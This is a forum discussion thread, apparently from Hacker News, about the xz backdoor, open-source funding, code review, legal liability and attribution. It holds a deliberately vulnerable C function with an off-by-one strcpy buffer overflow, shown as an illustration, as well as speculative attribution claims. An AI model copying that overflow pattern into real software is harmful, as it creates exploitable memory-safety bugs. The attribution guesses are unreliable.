I think big tech should pay. We know the truth is that they'll pass on the costs to us anyway. I'd also be happy to pay taxes for it, but that's probably harder. I'm not sure what the best solution is, and this is clearly only a part of a much larger problem, but I think it is very important that we actually talk about how much value OSS has. If we're going to talk about how money represents the value of work, we can't just ignore how much value is generated from OSS and only talk about what's popular and well known. There are tons of pieces of critical infrastructure in every system you could think of (traditional engineering, politics, anything) that are unknown. We shouldn't just pay for things that are popular. We should definitely pay for things that are important. Maybe the conversation can be different when AI takes all the jobs (lol)
Ya so we could have paid this dude to put the exploits in our programs good IDEA y
If you're going to criticize me, at least read what I wrote first
Using what bank? He used a fake name and a VPN.
I get why, in principle, we should pay people for open source projects, but I guess it doesn't make much of a difference when it comes to vulnerabilities.
First off, there are a lot of ways to bring someone to "the dark side". Maybe it's blackmail. Maybe it's ideology ("the greater good"). Maybe it's just pumping their ego. Or maybe it's money, but not that much, and extra money can be helpful. There is a long history of people spying against their country or hacking for a variety of reasons, even if they had a job and a steady paycheck. You can't just pay people and expect them to be 100% honest for the rest of their life.
Second, most (known) vulnerabilities are not backdoors. As any software developer knows, it's easy to make mistakes, and this also goes for vulnerabilities. Even as a paid software developer, you can definitely mess up a function (or method) and accidentally introduce an off-by-one vulnerability, or forget to properly validate inputs, or reuse a supposedly one-time cryptographic quantity.
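For instance, an honest mistake as small as the off-by-one sketched below is enough to create an exploitable memory-safety bug, no malice required (a deliberately simplified example):
    #include <string.h>

    /* The bounds check uses <= instead of <, so a 16-character name
       writes 16 bytes plus the terminating NUL -- 17 bytes -- into a
       16-byte buffer. A classic accidental off-by-one overflow. */
    void save_name(const char *name)
    {
        char buf[16];
        if (strlen(name) <= sizeof buf) {   /* should be: < sizeof buf */
            strcpy(buf, name);
            /* ... use buf ... */
        }
    }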
I think it does make a difference when it comes to vulnerabilities and especially infiltrators. You're doing these things as a hobby. Outside of your real work. If it becomes too big for you it's hard to find help (exact case here). How do you pass on the torch when you want to retire?
I think money can help alleviate pressure from both your points. No one says that money makes them honest. But if it's a full-time job, you are less likely to just quickly look and say lgtm. You make fewer mistakes when you're less stressed or tired. It's harder to be corrupted because people would rather have a stable job and career than a one-time payout. Pay also makes it easier to trace.
Again, it's not a 100% solution. Nothing will be! But it's hard to argue that this wouldn't alleviate significant pressure.
https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.h...
When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it.
Sure you can. You can be more vigilant and careful when walking near traffic. So maybe don't have headphones on, and engage all your senses on the immediate threats around you. This won't guarantee that a car won't run you over, but it reduces the chances considerably to where you can possibly avoid it.
The same can be said about the xz situation. All the linters, CI checks and code reviews couldn't guarantee that this wouldn't happen, but they sure would lower the chances that it does. Having a defeatist attitude that nothing could be done to prevent it, and that therefore all these development practices are useless, is not helpful for when this happens again.
The major problem with the xz case was the fact it had 2 maintainers, one who was mostly absent, and the other who gradually gained control over the project and introduced the malicious code. No automated checks could've helped in this case, when there were no code reviews, and no oversight over what gets merged at all. But had there been some oversight and thorough review from at least one other developer, then the chances of this happening would be lower.
It's important to talk about probabilities here instead of absolute prevention, since it's possible that even in the strictest of environments, with many active contributors, malicious code could still theoretically be merged in. But without any of it, the chance of a malicious change getting merged approaches 100% (discounted by the probability of someone acting maliciously to begin with, having their account taken over, etc.).
It's not defeatist to admit and accept that some things are ultimately out of our control. And more importantly, that any attempt to increase control over them comes with downsides.
An open source project that imposes all kinds of restrictions and complex bureaucratic checks before anything can get merged, is a project I wouldn't want to participate in. I imagine many others might feel the same. So perhaps the loss from such measures would be greater than the gain. Without people willing to contribute their time, open source cannot function.
It's not defeatist to admit and accept that some things are ultimately out of our control.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
And more importantly, that any attempt to increase control over them comes with downsides.
That's a subjective opinion. I personally find linters and code reviews essential to software development, and if you think of them as being restrictions or useless bureaucratic processes that prevent you from contributing to a project then you're entitled to your opinion, but I disagree. The downsides you mention are simply minimum contribution requirements, and not having any at all would ultimately become a burden on everybody, lead to a chaotic SDLC, and to more issues being shipped to users. I don't have any empirical evidence to back this up, so this is also "just" my opinion based on working on projects with well-defined guidelines.
I'm sure you would agree with the Optimistic Merging methodology[1]. I'd be curious to know whether this has any tangible benefits as claimed by its proponents. At first glance, a project like https://github.com/zeromq/libzmq doesn't appear to have a more vibrant community than a project of comparable size and popularity like https://github.com/NixOS/nix, while the latter uses the criticized "Pessimistic Merging" methodology. Perhaps I'm looking at the wrong signals, but I'm not able to see a clear advantage of OM, while I can see clear disadvantages of it.
libzmq does have contribution guidelines[2], but a code review process is unspecified (even though it mentions having "systematic reviews"), and there are no testing requirements besides patches being required to "pass project self-tests". Who conducts reviews and when, or who works on tests is entirely unclear, though the project seems to have 75% coverage, so someone must be doing this. I'm not sure whether all of this makes contributors happier, but I sure wouldn't like to work on a project where this is unclear.
Without people willing to contribute their time, open source cannot function.
Agreed, but I would argue that no project, open source or otherwise, can function without contribution guidelines that maintain certain quality standards.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
In this particular case, having a static project or a single maintainer rarely releasing updates would actually be an improvement! The people/sockpuppets calling for more/faster changes to xz and more maintainers to handle that is exactly how we ended up with a malicious maintainer in charge in the first place. And assuming no CVEs or external breaking changes occur, why does that particular library need to change?
Difference is that software backdoors can affect billions of people. That driver on the road can't affect too many without being caught.
In this case, had they been a bit more careful with performance, they could have affected millions of machines without being caught. There aren't many cases where a lone wolf can do so much damage outside of software.
A few more issues like this in crucial software and we might actually see the big companies stepping up to fund that kind of care and attention.
This is a good take. But even in a forest, sometimes when tragedy strikes people do postmortems, question regulations and push for change.
Sometimes it does seem like the internet incentivizes harm, or at least makes everyone accessible to a higher ratio of people who seek to do harm than normal.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
Wholeheartedly agree. Fundamentally, we all assume that people are operating with good will and establish trust with that as the foundation (granted to varying degrees depending on the culture, some are more trusting or skeptical than others).
It's also why building trust takes ages and destroying it only takes seconds, and why violations of trust at all are almost always scathing to our very soul.
We certainly can account for bad actors, and depending on what's at stake (eg: hijacking airliners) we do forego assuming good will. But taking that too far is a very uncomfortable world to live in, because it's counter to something very fundamental for humans and life.
The late author of ZeroMQ, Pieter Hintjens, advocated for a practice called Optimistic Merging[1], where contributions would be merged immediately, without reviewing the code or waiting for CI results. So your approach of having lax merging guidelines is not far off.
While I can see the merits this has in building a community of contributors who are happy to work on a project, I always felt that it allows the project to grow without a clear vision or direction, and ultimately places too much burden on maintainers to fix contributions of others in order to bring them up to some common standard (which I surely expect any project to have, otherwise the mishmash of styles and testing practices would make working on the project decidedly not fun). It also delays the actual code review, which Pieter claimed does happen, to some unknown point in the future, when it may or may not be exhaustive, and when it's not clear who is actually responsible for conducting it or fixing any issues. It all sounds like a recipe for chaos where there is no control over what eventually gets shipped to users. But then again, I never worked on ZeroMQ or another project that adopted these practices, so perhaps you or someone else here can comment on what the experience is like.
And then there's this issue of malicious code being shipped. This is actually brought up by a comment on that blog post[2], and Pieter describes exactly what happened in the xz case:
Let's assume Mallory is patient and deceitful and acts like a valid contributor long enough to get control over a project, and then slowly builds in his/her backdoors. Then careful code review won't help you. Mallory simply has to gain enough trust to become a maintainer, which is a matter of how, not if.
And concludes that "the best defense [...] is size and diversity of the community".
Where I think he's wrong is that a careful code review _can_ indeed reduce the chances of this happening. If all contributions are reviewed thoroughly, regardless if they're authored by a trusted or external contributor, then strange behavior and commits that claim to do one thing but actually do something else, are more likely to be spotted earlier than later. While OM might lead to a greater community size and diversity, which I think is debatable considering how many projects exist with a thriving community of contributors while also having strict contribution guidelines, it doesn't address how or when a malicious patch would be caught. If nobody is in charge of reviewing code, there are no testing standards, and maintainers have additional work keeping some type of control over the project's direction, how does this actually protect against this situation?
The problem with xz wasn't a small community; it was *no* community. A single malicious actor got control of the project, and there was little oversight from anyone else. The project's contribution guidelines weren't a factor in its community size, and this would've happened whether it used OM or not.
[1]: http://hintjens.com/blog:106
[2]: http://hintjens.com/blog:106/comments/show#post-2409627
The problem with xz wasn't a small community; it was no community. A single malicious actor got control of the project, and there was little oversight from anyone else.
So because of this a lot of other highly used software was importing and depending on unreviewed code. It's scary to think how common this is. The attack surface seems unmanageable. There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
This is why it's a good practice to minimize the number of dependencies, and add dependencies only when absolutely required. Taking this a step further, doing a cursory review of each dependency and seeing the transitive dependencies it introduces is also beneficial. Of course, it's impractical to do this for the entire dependency tree, and at some point we have to trust that the projects we depend on follow this same methodology, but having a lax attitude about dependency management is part of the problem that caused the xz situation.
One thing that I think would improve this are "maintenance scores": a service that would scan projects on GitHub and elsewhere, and assign a score to each project indicating how well maintained it is. It would take into account the number of contributors in the past N months, development activity, community size and interaction, etc. Projects could showcase this in a badge in their READMEs, and it could be integrated into package managers and IDEs, which could warn users when adding a dependency that has a low maintenance score. Hopefully this would dissuade people from using poorly maintained projects, and encourage them to use better maintained ones, or avoid the dependency altogether. It would also encourage maintainers to improve their score, and there would be higher visibility of projects that are struggling but have a large user base, as potentially more vulnerable to this type of attack. And then we can work towards figuring out how to provide the help and resources they need to improve.
Does such a service/concept exist already? I think GitHub should introduce something like this, since they have all the data to power it.
That's not an effective idea, for the same reason that lines of code is not a good measure of productivity. It's an easy measure to automate, but it's purely performative as it doesn't score the qualitative value of any of the maintenance work. At best it encourages you to use only popular projects, which is its own danger (software monoculture is cheaper to attack) without actually resolving the danger - this attack is sophisticated and underhanded enough that it could be slipped through almost any code review.
One real issue is that xz’s build system is so complicated that it’s possible to slip things in which is an indication that the traditional autoconf Linux build mechanism needs to be retired and banned from distros.
But even that’s not enough because an attack only needs to succeed once. The advice to minimize your dependencies is an impractical one in a lot of cases (clearly) and not in your full control as you may acquire a surprising dependency due to transitiveness. And updating your dependencies is a best practice which in this case actually introduces the problem.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned. For example, it would be pretty effective counter incentive for talent if we could permanently ban this person from ever working on lots of projects. That’s typically how humans deal with members of a community who misbehave and we don’t have a good digital equivalent for software development. Of course that’s also dangerous as blackball environments tend to become weaponized.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned.
So, either no open source development because nobody will vouch to that degree for others, or absolutely no anonymity, and you'll have to worry about anything you provide because if you screw up and introduce an RCE, all of a sudden you'll have a bunch of people and companies looking to say it was on purpose so they don't have to own up to any of their own poor practices that allowed it to actually be executed on?
You don't need vouching for anyone. mDL is going to be a mechanism to have a government authority vouch for your identity. Of course a state actor like this can forge the identity, but that forgery at least will give a starting point for the investigation to try to figure out who this individual is. There are other technical questions about how you verify that the identity really is tied in some real way to the user at the other end (e.g. not a stolen identity), but there are things coming down the pipe that will help with that (i.e. authenticated chains of trust for hardware that can attest that the identity was signed on the given key in person, and you require that attestation).
As for people accusing you of an intentional RCE, that may be a hypothetical scenario but I doubt it’s very real. Most people have a very long history of good contributions and therefore have built up a reputation that would be compared against the reality on the ground. No one is accusing Lasse Collin of participating in this even though arguably it could have been him all along for what anyone knows.
It doesn’t need to be perfect but directionally it probably helps more than it hurts.
All that being said, this clearly seems like a state actor which changes the calculus for any attempts like this since the funding and power is completely different than what most people have access to and likely we don’t have any really good countermeasures here beyond making it harder for obfuscated code to make it into repositories.
Your idea sounds nice in theory, but it's absolutely not worth the amount of effort. To put it in perspective, think about the xz case: how would the number of contributions have prevented the release artifact (tarball) from being modified? Because other people would have used the tarball? Why? The only ones that use tarballs are the ones redistributing the code, and they will not audit it. The ones that could audit it would look at the version control repository, not at the tarballs. In other words, your solution wouldn't even be effective at potentially discovering this issue.
The only thing that would effectively do this is for people to stop trusting build artifacts and instead package directly from the public repositories. You could figure out if someone maliciously modified the release artifact by comparing it against the tagged version, but at that point, why not just shallow clone the entire thing and be done with it.
Even if you mandated two code reviewers per merge, the attacker can just have three fake personas backed by the same single human and use them to author and approve malware.
Also, in a more optimistic scenario without sockpuppets, it's unlikely that malicious and underhanded contributions will be caught by anyone that isn't a security researcher.
Does that mean we don’t look into changes in dependencies at all when bumping them?
As always, there's a relevant XKCD: #2347.[0] It's frightening how much of modern infrastructure depends on vulnerable systems.
then strange behavior and commits that claim to do one thing but actually do something else, are more likely to be spotted earlier than later.
https://en.wikipedia.org/wiki/Underhanded_C_Contest
It's actually an art to write code like that, but it's not impossible, and it will dodge cursory inspection. And it's possible to construct it in a way that gives plausible deniability.
I'm not sure why my point is not getting across...
I'm not saying that these manual and automated checks make a project impervious to malicious actors. Successful attacks are always a possibility even in the strictest of environments.
What they do provide is a _chance reduction_ of these attacks being successful.
Just like following all the best security practices doesn't produce 100% secure software, neither does following best development practices prevent malicious code from being merged in. But this doesn't mean that it's OK to ignore these practices altogether, as they do have tangible benefits. I argue that projects that have them are better prepared against this type of attack than those that do not.
I wonder how good automated LLM-based code reviews would be at picking up suspicious patterns in pull requests.
Don't you think that something as simple as a CLA (contributor license agreement) would prevent this type of thing? Of course it creates noise in the open source contribution funnel, but let's be honest: if you are dedicating yourself to something like contributing to OSS, signing a CLA should not be something unrealistic.
What exactly is a CLA going to do to a CCP operative (as appears to be the case with xz)? Do you think the party is going to extradite one of their state sponsored hacking groups because they got caught trying to implement a backdoor?
Or do you think they don’t have the resources to fake an identity?
The whole Chinese name and UTC+8 were a cover, as the person apparently was from EET
It ultimately doesn't matter whether it was Russia or China, beyond the potential political fallout, but do you have a link to the proof pointing towards EET?
There was a link in this thread pointing to a commit-times analysis, and it kinda checks out. Adding some cultural and outside-world context, I can at least guess which alphabet this three-four-six-letter agency uses to spell its name.
Case closed, you are right... A CLA could of course make things a bit more difficult for someone not backed by a state sponsor. But if that's the case, you are right.
Sadly the only way to even have a chance of fighting this is to insist on new contributors being vetted in person, and even that won’t be fool-proof.
It’s also not scalable and likely won’t ever happen, but it’s the only solution I can come up with.
A CLA is not an ID check. It is to hand the rights for the code over to the project owners, rather than doing any identity check.
Agreed, but that does not mean it couldn't be. As per the terms, the content of a CLA could be anything, and that's my point.
Then the question becomes "should we require ID for open source contributions?" and the answer is most likely no, not a good idea.
That's stretching the traditional definition. Usually CLAs are solely focused on addressing the copyright conditions and intellectual property origin of the contributed changes. Maybe just "contributor agreement" or "contributor contract" would describe that.
It never ceases to amaze me what great lengths companies go to around securing the perimeter of the network, while having engineering staffs that just routinely brew install casks or vi/emacs/vscode/etc extensions.
Rust is arguably the programming language and/or community with the most secure set of defaults that are fairly impossible to get out of, but even at “you can’t play games with pointers” levels of security-first, the most common/endorsed path for installing it (that I do all the time because I’m a complete hypocrite) is:
https://www.rust-lang.org/tools/install
and that’s just one example, “yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block” is just muscle memory for way too many of us at this point.
I actually avoided installing Rust originally because I thought that install page was hijacked by an attacker or something.
Most languages don't have the prettiest install flows, but a random `curl | sh` is just lunacy if you're at all security conscious
yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block
Ahhh this takes me back to... a month ago...[0]
At least rust wraps the script in a main function so you won't run a partially downloaded command, but that still doesn't mean there aren't other dangers. I'm more surprised by how adamant people are that there's no problem. You can see elsewhere in the thread that piping to sh could still (who knows!) pose a risk. Especially when you consider how trivial the fix is, given that people are just copy-pasting the command anyway...
It never ceases to amaze me how resistant people are to very easily solvable problems.
It's worse than that. build.rs is in no way sandboxed, which means you can inject all sorts of badness into downstream dependencies, not to mention do things like steal crypto keys from developers. It's really a sore spot for the Rust community (to be fair, they're not uniquely worse, but that's a fairly poor standard to shoot for).
What’s the game?
To be honest, it was just a matter of time until we found out our good-faith beliefs were being exploited. Behaviors like "break fast and fix early" or "who wants to take over my project ownership" just ask for trouble, and yet it's unthinkable to live without them, because open source is an unpaid labor of love. Sad to see this happen, but I'm not surprised. I wish for better tools (also open source) to combat such bad actors. Thanks to all the researchers out there who try to protect us all.
Where is the law enforcement angle on this? This individual/organization needs to be on the top of every country's most wanted lists.
I understand the impulse to seek justice, but what crime have they committed? It's illegal to gain unauthorized access, but not to write vulnerable code. Is there evidence that this is being exploited in the wild?
I am definitely not a lawyer, so I have no claim to knowing what is or is not a crime. However, if backdooring SSH on a potentially wide scale doesn't run afoul of any laws, then we need to seriously have a discussion about the modern world. I'd argue that investigating this as a crime is likely in the best interest of public safety and even (I hesitate to say this) national security, considering the potential scale of this. Finally, I would say there is a distinction between writing vulnerable code and creating a backdoor with malicious intent. It appears (from the articles I have been reading so far) that this was malicious, not an accident or lack of skill. We will see over the next few days, though, as more experts get eyes on this.
Agreed on a moral level, and it's true that describing this as simply "vulnerable code" doesn't capture the clear malicious intent. I'm just struggling to find a specific crime. CFAA requires unauthorized access to occur, but the attacker was authorized to publish changes to xz. Code is speech. It was distributed with a "no warranty" clause in the license.
If more than one person was involved, it'd presumably fall under criminal conspiracy. Clearly this was an overt act in furtherance of a crime (unauthorized access under CFAA, at the least).
The criminal conspiracy laws don’t apply to the organizations that write this kind of code, just like murder laws don’t.
Sure they do. Getting the perpetrator into your jurisdiction is the tough part.
Putin is, for example, unlikely to go anywhere willing to execute an ICC arrest warrant.
Nah, the CIA assassinates people in MLAT zones all the time. The laws that apply to you and I don’t apply to the privileged operators of the state’s prerogatives.
We don't even know that this specific backdoor wasn't the NSA or CIA. Assuming it was a foreign intelligence service because the fake name was Asian-sounding is a bit silly. The people who wrote this code might be sitting in Virginia or Maryland already.
Virginia or Maryland
Eastern Europe, suggest the timestamp / holiday analysts. https://rheaeve.substack.com/p/xz-backdoor-times-damned-time...
Eastern Europe - 25th? Not 24th?
Note that while “Eastern Europe” has firm connotations with countries of which some are known for having corrupt autocracies, booming shady businesses, and organized crime and cybercrime gangs in varying proportions, the time zone mentioned also covers Finland, from which the other author is supposed to be.
The people who wrote this code might be sitting in Virginia or Maryland already.
Sure, that’s possible. They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
First of all, it's not like their individual identities would ever be known.
Second, they would already know that traveling to a hostile country is a great way to catch bullshit espionage charges, maybe end up tortured, and certainly be used as a political pawn.
Third, this is too sloppy to have originated from there anyways—however clever it was.
CFAA covers this. It's a crime to
> knowingly [cause] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
Where one of the definitions of “protected computer” is one that is used in interstate commerce, which covers effectively all of them.
It seems like the backdoor creates the potential to "cause damage" but doesn't [provably?] cause damage per se?
The author of the backdoor doesn't themselves "[cause] the transmission of a program ...". Others do the transmission.
Seems weak, unless you know of some precedent case(s)?
The malicious author caused the transmission of the release tarball to GitHub and the official project site. This act was intentional and as a direct result other computers were damaged (when their administrators unknowingly installed the backdoored library).
You’ve got to be joking if you’re saying that this wouldn’t be an open and shut case to prosecute. It’s directly on point. Law isn’t code, any jury would have zero trouble convicting on these facts.
Hello fellow "law isn't code" traveller. (my least favorite engineer habit!)
The back door is damage. The resulting sshd is like a door with a broken lock. This patch breaks the lock. Transmitting the patch caused intentional damage.
Law isn't code. If someone finds precedent, there will be a way to argue it doesn't cover this specific scenario. They call this conversational process "hypos" in law school, and this fundamental truth is why you never hear of a lawyer being stumped as to how to defend a client.
Ultimately, the CFAA will get it done if it gets that far, armchair lawyering aside.
To pressure test this fully, since it can be caricatured as "we can punish degenerate behavior as needed", which isn't necessarily great: it's also why there's a thin line between an authoritarian puppet judiciary and a fair one.
The CFAA covers distribution of malicious software without the owner's consent, the Wire Fraud Act covers malware distribution schemes intended to defraud for property, and the Computer Misuse Act in the UK is broad and far-reaching like the CFAA, so this likely falls afoul of that too. The GDPR protects personal data, so there's possibly a case to be made that this violates that as well, though that might be a bit of a reach.
In which case the defense will claim, correctly, that this malware was never distributed. It was caught. "Attempted malware distribution" may not actually be a crime (but IANAL so I don't know).
Folks who run Debian SID or Fedora testing may disagree.
It is like opening the door of a safe and letting someone else rob the money inside.
This is way beyond "moral level".
Laws don’t fix technical issues any more than they fix physical ones. Clearly this was possible, so it could be done by a foreign intelligence agency or well-hidden criminal organization.
I think this is probably illegal. But, I think we should not punish this sort of thing too harshly. Tech is an ecosystem. Organizations need to evolve to protect themselves. Instead, we should make companies liable for the damage that happens when they are hit by one of these attacks.
Before anyone calls it out: yes, this will be blaming the victim. But, companies aren’t people, and so we don’t really need to worry about the psychological damage that victim blaming would do, in their case. They are systems, that respond to incentives, and we should provide the incentives to make them tough.
It's not simply vulnerable code: it's an actual backdoor. That is malware distribution (without permission) and is therefore illegal.
Is it illegal to distribute malware? I see security researchers doing it all the time for analysis purposes.
No, it is not illegal to distribute malware by itself, but it is illegal to trick people into installing malware. The latter was the goal of the XZ contributor.
I assume you're talking from a USC perspective? Can you say which specific law, chapter, and clause applies?
I would somewhat agree, but then the question comes to mind: what is the "legal" definition of malware?
Some people would say that most DRM software acts like malware/ransomware.
And tricking people into installing such software is only a matter of an ambiguously worded checkbox.
Specifically, the CFAA covers distribution of malicious software without the owner's consent. Security researchers downloading malware implicitly give consent, since they are downloading malware marked as such.
What is constantly overlooked here on HN is that in legal terms, one of the most important things is intent. Commenters on HN always approach legal issues from a technical perspective but that is simply not how the judicial system works. Whether something is “technically X” or not is irrelevant, laws are usually written with the purpose of catching people based on their intent (malicious hacking), not merely on the technicalities (pentesters distributing examples).
Yeah, it bothers me so much. They really seem to think that "law is code".
It is code, but it runs on human wetware which can decode input about actual events into output about intent, and reach consensus about this output via proper court procedures.
Calling this backdoor "vulnerable code" is a gross mischaracterization.
This is closer to a large-scale trojan horse, one that does not have to be randomly discovered by a hacker to be exploited, but is readily available for privileged remote code execution by whoever has the private key to this backdoor.
If CFAA doesn't get this guy behind bars then the CFAA is somehow even worse. Not only is it an overbroad and confusing law, it's also not broad enough to actually handcuff people who write malicious code.
I'd be surprised if the attacker didn't meet the criteria for mens rea.
In the UK, at least, this would be unauthorised access to computer material under section 1 of the Computer Misuse Act 1990 - and I would assume that it would also fall foul of sections 2 ("Unauthorised access with intent to commit or facilitate commission of further offences") and 3A ("Making, supplying or obtaining articles for use in offence under section 1, 3 or 3ZA") as well.
Though proving jurisdiction would be tricky...
Based on the level of sophistication being alluded to, I'm personally inclined to assume this is a state actor, possibly even some arm of the U.S. govt.
possibly even some arm of the U.S. govt.
Possible. But why mention U.S. specifically? Is it more likely than Russia, Iran, China, France ... ?
The US is behind more documented backdoors than those other countries.
Highly likely. China has been estimated to have cyberhacking resources 10-50x what the USA has currently. It's not even close. The USA will have to up its game soon or accept China being able to shut down large swathes of the grid and critical infrastructure at will.
This individual/organization needs to be on the top of every country's most wanted lists
Because if the "organization" is a U.S. agency, not much is going to happen here. Russia or China or North Korea might make some strongly worded statements, but nothing is going to happen.
It's also very possible that security researchers won't be able to find out, and government agencies will finger-point as a means of misdirection.
For example, a statement comes out in a month that this was North Korea. Was it really? Or are they just a convenient scapegoat so the NSA doesn't have to play defense on its lack of accountability again?
To me it seems too clumsy to be USG. They seem to prefer back doors that are undetectable or hide in plain sight.
But it might be an NSA op designed to instigate a much needed serious examination of the supply chain.
That would honestly be one of the most impactful bits of public service to fall out of any agency, regardless of country. Even if this is nefarious, a couple of intentionally clumsy follow-ups designed to draw further attention would be amazing to see. Think chaos monkey for software supply chain.
Can the community aspects of FOSS survive a Spy vs Spy environment though?
I don't know, but the answer is irrelevant to whether we are in one (we are).
I shudder to think what lurks in the not-open-source world. Closed source software/firmware/microcode, closed spec/design hardware; and artificial restriction of device owners from creating replacement code, or modifying code in consumer and capital goods containing universal machines as components; are significant national security threats and the practice of keeping design internals and intent secret in these products produces a cost on society.
I propose that products which don't adhere to GNU-like standards of openness (caveat*) get national sales taxed some punitive obscene percentage, like 100%. This way the government creates an artificial condition which forces companies to comply lest their market pricing power be absolutely hobbled. If say your company makes five $10MM industrial machines for MEGACORP customer and you're the only game in town, MEGACORP can pay the sales tax. Brian, Dale, and Joe Sixpack can't afford $2,500+ iPhones and Playstations, or $70,000 base model Honda Civics (yes this should apply to cars and especially medical devices/prosthetics), so when Company B comes around making a somewhat inferior competing fully open product then Company A making the proprietary version loses a huge chunk of market share.
(*But not the GNU-spirit distribution rights, so the OEM or vendor is still the only entity legally allowed to distribute [except for national emergency level patches]. Patent rights still apply.)
This is the most direct and sane way to address the coming waves of decade+ old lightbulbs and flatscreens. It has fewest "But if" gotcha exceptions with which to keep screwing you. Stop sticking up for your boss and think about the lack of access to your own devices, or better yet the implicit and nonconsensual perpetual access vendors maintain to universal machines which by all rights only you should have sovereign control over (like cooking your own microcode or tweaking Intel's [but not distributing your tweaks to Intel's])!
Remember how bad, slow, and obvious Dual_EC_DRBG was?
Overcomplicated design, sloppy opsec and an Eastern European time zone altogether sound more like an attempt to snatch some bitcoins by a small group of people in those places.
I wonder what had happened in Eastern Europe ~2 years ago...
The obvious, but not yet pointed out part here -- not everything we call "EE" here is actually using EET/EEST.
easy there. calling the cops on the NSA might be treason or something
I would have thought NSA would have hardware/firmware backdoor everywhere and wouldn't need this.
Probably not for fully Chinese hardware. Although this backdoor is only x86 so it still wouldn't work there.
Like that spiderman meme, it's all the NSA
CISA had a report on this pretty quickly. I think they refer cases to Secret Service for enforcement. But really, we seemingly have no idea who or where the perpetrator is located. This could easily be a state actor. It could be a lone wolf. And the effects of the attack would be global too, so jurisdiction is tricky. We really have no idea at this point. The personas used to push the commits and push for inclusion were almost certainly fronts. I'm sure github is sifting through a slew of subpoenas right now.
github retains an incredible amount of data to review. but if it is a state actor, they likely covered their tracks very well. when i found the original address of the person who hacked elon musk's twitter account it led to an amazon ec2 instance. that instance was bought with stolen financial information and accessed via several vpns and proxies. i would expect state actors to further obfuscate their tracks with shell companies and the like
State actors get to invent people. Literally.
Lmao it’s a state actor bro
Its been all of 24 hours, these things take time. Presumably someone doing an attack this audacious took steps to cover their tracks and is using a fake name.
So this basically means to scan for this exploit remotely we'd need the private key of the attacker which we don't have. Only other option is to run detection scripts locally. Yikes.
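For the "run detection scripts locally" route, a minimal sketch of what a local check could look like (Python, standard library only; it assumes a Linux box with sshd at /usr/sbin/sshd and xz on PATH, and it only flags the known-bad 5.6.0/5.6.1 releases plus whether sshd pulls in liblzma at all - it is not a general backdoor detector):

    import re
    import subprocess

    # Assumptions: Linux, sshd installed at /usr/sbin/sshd, xz on PATH.
    KNOWN_BAD = {"5.6.0", "5.6.1"}  # the backdoored upstream releases

    def sshd_links_liblzma() -> bool:
        # Debian/Ubuntu patch sshd to link libsystemd, which pulls in liblzma.
        out = subprocess.run(["ldd", "/usr/sbin/sshd"],
                             capture_output=True, text=True).stdout
        return "liblzma" in out

    def xz_version() -> str:
        out = subprocess.run(["xz", "--version"],
                             capture_output=True, text=True).stdout
        m = re.search(r"(\d+\.\d+\.\d+)", out)
        return m.group(1) if m else "unknown"

    if __name__ == "__main__":
        ver = xz_version()
        print("xz/liblzma version:", ver,
              "(known-bad release)" if ver in KNOWN_BAD else "")
        print("sshd links liblzma:", sshd_links_liblzma())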
One completely awful thing some scanners might choose to do is if you're offering RSA auth (which most SSH servers are and indeed the SecSH RFC says this is Mandatory To Implement) then you're "potentially vulnerable" which would encourage people to do password auth instead.
Unless we find that this problem has somehow infested a lot of real world systems that seems to me even worse than the time similar "experts" decided that it was best to demand people rotate their passwords every year or so thereby ensuring the real security is reduced while on paper you claim you improved it.
Have to admit I've never understood why password auth is considered so much worse than using a cert - surely a decent password (long, random, etc.) is for all practical purposes unguessable, and so you're either using a private RSA key that no one can guess, or a password that no one can guess, and then what's the difference? With the added inconvenience of having to pass around a certificate if you want to log in to the same account from multiple sources.
It depends what happens to the password. Typically it's sent as a bearer credential. But there are auth schemes (not widely used these days) where the password isn't sent over the wire.
Isn't it pretty standard practice to salt and hash the password client-side before sending it over the wire?
No, usually it's sent in plain text to the server, however encapsulated.
Wow, really? Ten years ago, it was drilled into me to never send a password like that, especially since the server shouldn't have the plain version anyway (so no reason for the client to send it).
https://owasp.org/www-community/OWASP_Application_Security_F... says "Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken."
I didn't want to believe you, but man, I just checked a few websites in the network inspector... and it seems like GMail, Hackernews, Wordpress, Wix, and Live.com all just sent it in plaintext with only SSL encryption :(
That's a bit disappointing. But TIL. Thanks for letting me know!
It doesn’t actually do anything because if SSL is compromised then all of the junk you think you are telling the client to do to the password is via JavaScript that is also compromised.
If you’re worried about passive listeners with ssl private keys, perfect forward secrecy at the crypto layer solved that a long time ago.
For browsers at least, sending passwords plainly over a tls session is as good as it gets.
It's not to protect against MITM but against credential reuse. It offers no additional security over SSL but what it does protect against is user passwords being leaked and attackers being able to reuse that same password across the user's other online accounts (banks, etc.).
Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken
I'm a little confused with this recommendation
How is the server supposed to verify the user's password in this case? By storing the same hash with exactly the same salt in the database, effectively making the transmitted salted hash a cleartext password?
Yes, the server should never have the cleartext password. In this case the salted hash is the same as a password to you, but it protects users who reuse the same password across different sites. If your entire password DB gets leaked, the attacker would be able to login to your site as your users, but they wouldn't be able to login as those users to other sites without brute forcing all the hashes.
